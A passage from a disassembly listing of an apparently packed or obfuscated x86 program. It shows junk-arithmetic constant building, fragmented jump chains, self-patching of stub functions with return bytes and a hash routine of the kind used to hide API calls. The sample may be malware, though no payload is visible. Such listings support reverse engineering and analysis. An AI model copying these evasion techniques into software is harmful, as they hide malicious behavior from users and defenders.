; END OF FUNCTION CHUNK FOR sub_44F3CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_4429C3: ; CODE XREF: sub_43F1B2+1561Cj
jmp loc_442AC0
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4428C8
loc_4429C8: ; CODE XREF: sub_4428C8+6468j
jmp loc_457440
; END OF FUNCTION CHUNK FOR sub_4428C8
; ---------------------------------------------------------------------------
loc_4429CD: ; CODE XREF: ut7h7i2x:0043A31Bj
jmp locret_445E66
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jo loc_44B6E0
push offset sub_448C41
jmp loc_44A143
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4429E3: ; CODE XREF: sub_4459EE-40FAj
; sub_4459EE:loc_4595B1j
push 2
push 400h
lea eax, [ebp-400h]
push eax
push eax
push 0FE22549h
pop eax
and eax, 2D9A8908h
jmp loc_45480D
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589E0
loc_442A03: ; CODE XREF: sub_4589E0-CBAAj
and edx, ebp
loc_442A05: ; CODE XREF: sub_4589E0:loc_443ADFj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_43D872
jmp loc_43DE03
; END OF FUNCTION CHUNK FOR sub_4589E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA33
loc_442A16: ; CODE XREF: sub_44AA33:loc_44AA39j
jl loc_44F8FE
pop edx
jmp loc_44F8F0
; END OF FUNCTION CHUNK FOR sub_44AA33
; ---------------------------------------------------------------------------
push 6D1C295Fh
pop eax
sub eax, 5F0BF7E5h
add eax, 58C0344Ah
add eax, ebp
add eax, 992F9230h
jmp loc_44C48D
; ---------------------------------------------------------------------------
sbb ebx, 4ABE790Dh
jmp sub_44D3B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_247. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_442A4D proc near ; CODE XREF: sub_45035B+5p
; ut7h7i2x:00450EDBj
; FUNCTION CHUNK AT 00444ECA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F9CE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004566D0 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push esi
push 3C7C6C0Dh
pop esi
or esi, 9C8C99EAh
test esi, 80h
jmp loc_4566D0
sub_442A4D endp
; ---------------------------------------------------------------------------
loc_442A69: ; DATA XREF: sub_439B58+11C63o
push eax
push offset sub_44EBD9
jmp locret_452205
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_442A74: ; CODE XREF: sub_4462B0+13349j
or edx, esi
loc_442A76: ; CODE XREF: ut7h7i2x:loc_45596Ej
call sub_4565B2
push edi
mov edi, edx
xchg edi, [esp+0Ch+var_C]
not edx
jmp loc_44D012
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
loc_442A88: ; DATA XREF: sub_456177-DF0Ao
pushf
push offset sub_454818
loc_442A8E: ; CODE XREF: ut7h7i2x:00450D44j
jmp locret_4596C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_442A93: ; CODE XREF: sub_4503C3:loc_43A5AAj
mov eax, ebp
xchg eax, [esp+4+var_4]
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_451B8F
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
loc_442AA3: ; CODE XREF: ut7h7i2x:00445F44j
jnz loc_45AA59
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_442AA9: ; CODE XREF: sub_4565B2-F384j
jmp loc_44EF34
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E13
loc_442AAE: ; CODE XREF: sub_445E13+Cj
jmp loc_446EBF
; END OF FUNCTION CHUNK FOR sub_445E13
; ---------------------------------------------------------------------------
db 0Fh
; ---------------------------------------------------------------------------
mov bl, [edx-7AFFFEB3h]
retf 91E9h
; ---------------------------------------------------------------------------
db 7Fh, 1, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_442AC0: ; CODE XREF: sub_43F1B2:loc_4429C3j
mov [edx], eax
pop edx
lea eax, nullsub_11
mov byte ptr [eax], 0C3h
jmp loc_4444FB
; END OF FUNCTION CHUNK FOR sub_43F1B2
; =============== S U B R O U T I N E =======================================
sub_442AD1 proc near ; CODE XREF: sub_41A6D9+27Bp
; sub_41A6D9+2AFp ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439374 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043A340 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F63C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004411DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8D6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045367E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458C77 SIZE 0000000E BYTES
push edx
jmp loc_43A340
sub_442AD1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D43D
loc_442AD7: ; CODE XREF: sub_44D43D+5j
pop ebx
jno loc_459AA8
mov eax, [esp-4+arg_0]
push edx
call sub_44B5CF
mov eax, 0D53D974Bh
push edi
push offset loc_43BB20
jmp nullsub_96
; END OF FUNCTION CHUNK FOR sub_44D43D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_442AF7: ; CODE XREF: sub_452B14:loc_43FF04j
pop edi
rol edi, 5
add edi, 6D460518h
xor edi, 0DF95EE4Ah
xor eax, edi
push offset loc_44AB2F
jmp loc_4493D5
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_442B13: ; CODE XREF: sub_44AA54:loc_449E36j
shl edi, 0Bh
js loc_444914
jmp loc_446552
; END OF FUNCTION CHUNK FOR sub_44AA54
; ---------------------------------------------------------------------------
jmp ds:off_41D000
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_442B27: ; CODE XREF: sub_44D5BE+4286j
jmp nullsub_292
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_442B2C: ; CODE XREF: ut7h7i2x:004549EBj
; sub_43B847:loc_456884j ...
jns loc_44D6DE
pop edx
mov eax, [esp-4+arg_0]
jmp loc_441F2E
; END OF FUNCTION CHUNK FOR sub_452C66
; =============== S U B R O U T I N E =======================================
sub_442B3B proc near ; CODE XREF: ut7h7i2x:0043DF09j
; sub_457565+1p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043976D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AF3B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043B2AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B35F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043B999 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043C0F1 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043CBEE SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0043D254 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E3DE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F373 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F995 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F9D5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00440F02 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00442857 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442FE7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044324A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443AEA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00443F4A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004450F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445C39 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00445CAC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445DCB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446F39 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A1D6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044A5CE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AA03 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C76C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044C9B0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044CE85 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044CF6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CFDC SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044D7C8 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044E646 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044EC49 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044EE02 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004500F2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450BFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450CCF SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00451BC8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452455 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452704 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453572 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00454253 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004562EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456444 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456509 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045681D SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00456A7C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00456BF4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004574A7 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045760E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004576EC SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00457782 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458162 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004582E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458BAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459376 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045ABBC SIZE 0000000F BYTES
xchg esi, [esp+0]
loc_442B3E: ; CODE XREF: ut7h7i2x:0043F38Fj
pop esi
mov ebp, esp
add esp, 0FFFFFFECh
mov [ebp-4], eax
push offset sub_4436F6
jmp loc_442BF4
; ---------------------------------------------------------------------------
locret_442B51: ; CODE XREF: ut7h7i2x:0044DDADj
retn
; ---------------------------------------------------------------------------
loc_442B52: ; CODE XREF: ut7h7i2x:004582B3j
jmp loc_44E646
; ---------------------------------------------------------------------------
loc_442B57: ; CODE XREF: sub_43CD08:loc_43B617j
jo loc_450CE3
mov eax, [esp+0]
push esi
mov esi, edx
xchg esi, [esp+0]
call sub_446B90
mov eax, 201E933Eh
call sub_43AA94
jmp loc_450CCF
; ---------------------------------------------------------------------------
loc_442B7A: ; CODE XREF: sub_44101A:loc_44971Bj
mov al, 1
shl al, cl
push 4D187069h
pop edx
and edx, 565FF02Dh
rol edx, 0Bh
add edx, 0EB92A20Eh
add edx, ebp
jmp loc_450BFD
; ---------------------------------------------------------------------------
loc_442B9A: ; CODE XREF: sub_43B513+2F15j
jz loc_43DE56
jmp loc_445CAC
; ---------------------------------------------------------------------------
loc_442BA5: ; CODE XREF: sub_43D021+C66Dj
js loc_456A7C
sub esi, edi
jmp loc_456509
; ---------------------------------------------------------------------------
loc_442BB2: ; CODE XREF: ut7h7i2x:00453F3Aj
jnz loc_456868
sub ebp, eax
or eax, 5C2F9E5Dh
loc_442BC0: ; CODE XREF: ut7h7i2x:loc_442652j
xor eax, 9E1D81CDh
loc_442BC6: ; CODE XREF: ut7h7i2x:loc_459DD6j
push 42EC0982h
pop eax
rol eax, 15h
jmp loc_44D7C8
; ---------------------------------------------------------------------------
loc_442BD4: ; CODE XREF: sub_4508DB:loc_448517j
jnz loc_443AF0
jmp loc_44CF6C
; ---------------------------------------------------------------------------
loc_442BDF: ; CODE XREF: sub_453D5B+Dj
jz loc_43D254
jmp loc_44A5CE
; ---------------------------------------------------------------------------
loc_442BEA: ; CODE XREF: sub_43A92F+100EEj
call sub_44B45E
loc_442BEF: ; CODE XREF: sub_452CE7+Ej
jmp loc_45681D
; ---------------------------------------------------------------------------
loc_442BF4: ; CODE XREF: sub_442B3B+11j
jmp nullsub_45
sub_442B3B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov ds:off_41D08C, eax
lea eax, sub_456EE0
mov byte ptr [eax], 0C3h
jmp sub_456EE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456EE0
loc_442C0D: ; CODE XREF: sub_456EE0+1j
push offset sub_441989
jmp loc_454122
; END OF FUNCTION CHUNK FOR sub_456EE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_442C17: ; CODE XREF: sub_457A66:loc_43B98Fj
jz loc_44B519
jmp loc_45119B
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_442C22 proc near ; CODE XREF: sub_43F058:loc_452C1Cj
; FUNCTION CHUNK AT 0043FA9D SIZE 00000005 BYTES
add esp, 0FFFFFFF8h
mov [ebp-8], edx
mov [ebp-4], eax
mov edx, [ebp-8]
mov eax, [ebp-4]
call sub_440CEC
mov edx, [ebp-8]
jmp loc_43FA9D
sub_442C22 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449808
loc_442C3E: ; CODE XREF: sub_449808:loc_440E2Ej
push offset sub_4487B0
jmp nullsub_337
; END OF FUNCTION CHUNK FOR sub_449808
; =============== S U B R O U T I N E =======================================
sub_442C48 proc near ; DATA XREF: ut7h7i2x:00456978o
; FUNCTION CHUNK AT 0043C049 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044074B SIZE 00000005 BYTES
push esi
push 5FBC835Dh
pop esi
xor esi, 5223BAF3h
rol esi, 1Dh
or esi, 9E5F004Ah
and esi, 0AAF904EFh
jmp loc_43C049
sub_442C48 endp
; ---------------------------------------------------------------------------
loc_442C69: ; CODE XREF: ut7h7i2x:00448477j
mov [eax], esi
; =============== S U B R O U T I N E =======================================
sub_442C6B proc near ; CODE XREF: sub_446CA0:loc_453A65p
; FUNCTION CHUNK AT 0043CBBD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452755 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push ebx
pushf
push 0A3BF94F9h
pop ebx
or ebx, 4966937Ah
jmp loc_452755
sub_442C6B endp
; ---------------------------------------------------------------------------
cdq
jmp loc_4394D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44765F
loc_442C88: ; CODE XREF: sub_44765F+1Bj
xchg edi, [esp+0]
jmp loc_43A3D0
; END OF FUNCTION CHUNK FOR sub_44765F
; ---------------------------------------------------------------------------
jmp loc_450745
; ---------------------------------------------------------------------------
jmp loc_43DE6E
; ---------------------------------------------------------------------------
loc_442C9A: ; CODE XREF: ut7h7i2x:004416DFj
; ut7h7i2x:00446430j ...
jnz loc_44D33C
cmp dword ptr [ebp-10Ch], 76676264h
jnz loc_446ECA
jmp loc_4552C3
; ---------------------------------------------------------------------------
push edx
mov edx, eax
xchg edx, [esp]
jmp loc_44EBBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D989
loc_442CC0: ; CODE XREF: sub_43D989j
push eax
mov eax, ebp
xchg eax, [esp+4+var_4]
jmp loc_4411A4
; END OF FUNCTION CHUNK FOR sub_43D989
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_200. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_442CCC: ; CODE XREF: ut7h7i2x:00445373j
jmp nullsub_541
; ---------------------------------------------------------------------------
loc_442CD1: ; DATA XREF: sub_4424E8+14968o
inc eax
mov [ebp-24h], eax
mov dword ptr [ebp-18h], 0
; START OF FUNCTION CHUNK FOR sub_459653
loc_442CDC: ; CODE XREF: sub_459653+2B7j
call sub_447DDB
loc_442CE1: ; CODE XREF: ut7h7i2x:0043B93Aj
jmp loc_4554F1
; END OF FUNCTION CHUNK FOR sub_459653
; ---------------------------------------------------------------------------
loc_442CE6: ; CODE XREF: ut7h7i2x:0044A0A7j
mov ds:dword_4481F4, eax
retn
; ---------------------------------------------------------------------------
loc_442CED: ; CODE XREF: ut7h7i2x:0045AACCj
jmp loc_44B08E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAB9
loc_442CF2: ; CODE XREF: sub_44CAB9+Bj
rol eax, 0Ch
push eax
retn
; END OF FUNCTION CHUNK FOR sub_44CAB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4460A2
loc_442CF7: ; CODE XREF: sub_4460A2+1Bj
jmp loc_43AFEC
; END OF FUNCTION CHUNK FOR sub_4460A2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D60
loc_442CFC: ; CODE XREF: sub_449D60:loc_442287j
jmp nullsub_69
; END OF FUNCTION CHUNK FOR sub_449D60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440DB3
loc_442D01: ; CODE XREF: sub_440DB3+5j
jmp nullsub_47
; END OF FUNCTION CHUNK FOR sub_440DB3
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442D06 proc near ; CODE XREF: sub_44EBD9p
; FUNCTION CHUNK AT 00439E66 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FE10 SIZE 0000000C BYTES
push ebp
mov ebp, esp
push ecx
jmp loc_439E66
sub_442D06 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_442D0F: ; CODE XREF: sub_447CBE:loc_4501F9j
adc edx, 0EE506A84h
jl loc_44CAF7
not ecx
test ecx, eax
jmp loc_43A922
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459935
loc_442D24: ; CODE XREF: sub_459935:loc_44B710j
; ut7h7i2x:0044D61Fj
and edx, 25EF3EABh
add edx, 0DEA0FAB7h
popf
xchg edx, [esp+0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_459935
; ---------------------------------------------------------------------------
mov ds:dword_41D19C, eax
lea eax, nullsub_541
mov byte ptr [eax], 0C3h
loc_442D48: ; CODE XREF: ut7h7i2x:00448356j
jmp nullsub_541
; ---------------------------------------------------------------------------
loc_442D4D: ; CODE XREF: ut7h7i2x:loc_44AD52j
rol ecx, 5
jnb loc_44D935
pop ebp
jmp loc_44D926
; ---------------------------------------------------------------------------
loc_442D5C: ; DATA XREF: sub_44DF79-A1EDo
xchg esi, [esp]
push 12BD5587h
pop edi
add edi, 4BFA0392h
sub edi, 4A928B69h
jmp loc_457C32
; ---------------------------------------------------------------------------
popf
loc_442D77: ; CODE XREF: ut7h7i2x:00444B1Fj
jmp sub_448CED
; ---------------------------------------------------------------------------
loc_442D7C: ; DATA XREF: sub_450231+1A89o
neg eax
call sub_452DE4
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_442D83: ; CODE XREF: sub_4558CC+1157j
jmp loc_4551AD
; END OF FUNCTION CHUNK FOR sub_4558CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_340. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_442D89: ; CODE XREF: sub_43F7A5+106F6j
add [ebp-8], eax
mov eax, [ebp-8]
shl eax, 0Ah
add [ebp-8], eax
mov eax, [ebp-8]
shr eax, 6
xor [ebp-8], eax
jmp loc_453D78
; END OF FUNCTION CHUNK FOR sub_43F7A5
; =============== S U B R O U T I N E =======================================
sub_442DA3 proc near ; DATA XREF: sub_4503C3:loc_443AA9o
call sub_44BB6F
retn
sub_442DA3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44928D
loc_442DA9: ; CODE XREF: sub_44928D+114DEj
jmp loc_455D9A
; END OF FUNCTION CHUNK FOR sub_44928D
; ---------------------------------------------------------------------------
loc_442DAE: ; CODE XREF: ut7h7i2x:004579CAj
jmp loc_43C1A3
; ---------------------------------------------------------------------------
loc_442DB3: ; CODE XREF: ut7h7i2x:00450E22j
jmp loc_44D972
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DAFF
loc_442DB8: ; CODE XREF: sub_4402A5-4B3Aj
; sub_43DAFF+Bj
push eax
mov eax, ecx
xchg eax, [esp+0]
push 35664D3Ah
pop ecx
jmp loc_449A33
; END OF FUNCTION CHUNK FOR sub_43DAFF
; ---------------------------------------------------------------------------
call sub_43B6FC
; START OF FUNCTION CHUNK FOR sub_43A513
loc_442DCE: ; CODE XREF: sub_43A513:loc_45218Aj
mov edx, eax
call sub_43F058
call sub_43BA59
or eax, eax
loc_442DDC: ; CODE XREF: ut7h7i2x:loc_453431j
jnz loc_450E77
jmp loc_43F0D6
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_442DE7: ; CODE XREF: sub_43D021:loc_44CDA8j
add eax, 0FF7BD3BDh
call sub_43AA94
mov ds:dword_41D138, eax
lea eax, nullsub_41
mov byte ptr [eax], 0C3h
jmp nullsub_41
; END OF FUNCTION CHUNK FOR sub_43D021
; =============== S U B R O U T I N E =======================================
sub_442E06 proc near ; CODE XREF: sub_40B2BC:loc_40B39Ap
; sub_442E06+5j
; DATA XREF: ...
call sub_442E16
jmp ds:off_41D13C
sub_442E06 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_442E11: ; CODE XREF: sub_452D3D-AC3Bj
jmp loc_45621D
; END OF FUNCTION CHUNK FOR sub_452D3D
; =============== S U B R O U T I N E =======================================
sub_442E16 proc near ; CODE XREF: sub_43DCB8-21Ej
; sub_444FDD-3237j ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004400D3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00443B38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A7EA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044E316 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004526A7 SIZE 0000000C BYTES
jb loc_4400D3
jmp loc_443B38
sub_442E16 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4543E9
loc_442E21: ; CODE XREF: sub_4543E9-BFBj
mov edi, eax
xchg edi, [esp+4+var_4]
push ecx
push 81570769h
pop ecx
jmp loc_4585CB
; END OF FUNCTION CHUNK FOR sub_4543E9
; ---------------------------------------------------------------------------
mov eax, [esp]
call sub_454196
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CDBA
loc_442E3B: ; CODE XREF: sub_43CDBA+A17Aj
jmp loc_44DCDD
; END OF FUNCTION CHUNK FOR sub_43CDBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441EC6
loc_442E40: ; CODE XREF: sub_441EC6+1j
jmp loc_45AE42
; END OF FUNCTION CHUNK FOR sub_441EC6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C20D
loc_442E45: ; CODE XREF: sub_44C20D-D8D8j
jmp loc_43DDBF
; END OF FUNCTION CHUNK FOR sub_44C20D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451A5A
loc_442E4A: ; CODE XREF: sub_451A5A+Aj
ror eax, 11h
add eax, 50E5DD38h
mov edx, [esp+4+var_4]
jmp loc_4501FE
; END OF FUNCTION CHUNK FOR sub_451A5A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_278. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_442E5C: ; CODE XREF: sub_459E54-A0B6j
jmp loc_4566AE
; END OF FUNCTION CHUNK FOR sub_459E54
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_293. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_442E62 proc near ; CODE XREF: sub_44CB78p
; ut7h7i2x:00450294j
xchg ebx, [esp+0]
pop ebx
call sub_442E76
jmp ds:off_41D0F8
sub_442E62 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_442E71: ; CODE XREF: ut7h7i2x:0044E04Ej
jmp loc_44599E
; =============== S U B R O U T I N E =======================================
sub_442E76 proc near ; CODE XREF: ut7h7i2x:loc_43D345j
; sub_442E62+4p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043BFEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DEB3 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00441862 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004483C1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044AE1F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004533A0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045A23A SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0045AE36 SIZE 00000005 BYTES
jb loc_45A23A
jmp loc_4483C1
sub_442E76 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0F5h, 19h, 3Fh
dd 0EB0513BEh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_442E88: ; CODE XREF: sub_445AD1-8919j
jmp loc_4409FE
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
db 0FCh, 0B0h, 65h
dword_442E90 dd 58161DF7h ; DATA XREF: sub_439BD1:loc_43E633r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4431E4
loc_442E94: ; CODE XREF: sub_4431E4+C2A7j
jmp loc_439163
; END OF FUNCTION CHUNK FOR sub_4431E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_442E99: ; CODE XREF: sub_44F495-8D65j
jmp loc_445AA9
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_442E9E: ; CODE XREF: sub_45601B-16D30j
jmp loc_459A30
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447185
loc_442EA3: ; CODE XREF: sub_447185-9E62j
jmp nullsub_64
; END OF FUNCTION CHUNK FOR sub_447185
; ---------------------------------------------------------------------------
dword_442EA8 dd 1877DD60h ; DATA XREF: sub_4558D7r
; ---------------------------------------------------------------------------
loc_442EAC: ; CODE XREF: ut7h7i2x:0044FAEFj
jmp loc_43D1E1
; ---------------------------------------------------------------------------
db 7Fh, 4Ch, 97h
dword_442EB4 dd 0 ; DATA XREF: sub_43E592:loc_447233o
; sub_44EB88+4o ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_442EB8: ; CODE XREF: sub_4529E0+8j
jmp loc_452E74
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A90F
loc_442EBD: ; CODE XREF: sub_43A90F+3j
jmp loc_457E96
; END OF FUNCTION CHUNK FOR sub_43A90F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_442EC2: ; CODE XREF: ut7h7i2x:loc_43D71Ej
; sub_44917B:loc_440984j
push 0B6843935h
xchg ebp, [esp+8+var_8]
mov eax, ebp
pop ebp
sub eax, 17731B8Dh
xor eax, 4B0CC55Ch
add eax, ebp
add eax, 2BE22708h
jmp loc_452C7D
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_442EE6: ; CODE XREF: sub_444EAA-64FBj
call sub_4443DE
loc_442EEB: ; CODE XREF: sub_452DE4+15j
jmp loc_4585F3
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_442EF0: ; CODE XREF: sub_439BF8+181F4j
jmp loc_45172F
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_442EF5: ; CODE XREF: ut7h7i2x:loc_457C17j
cmp ax, 0A5B3h
jnz loc_44F637
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EB8A
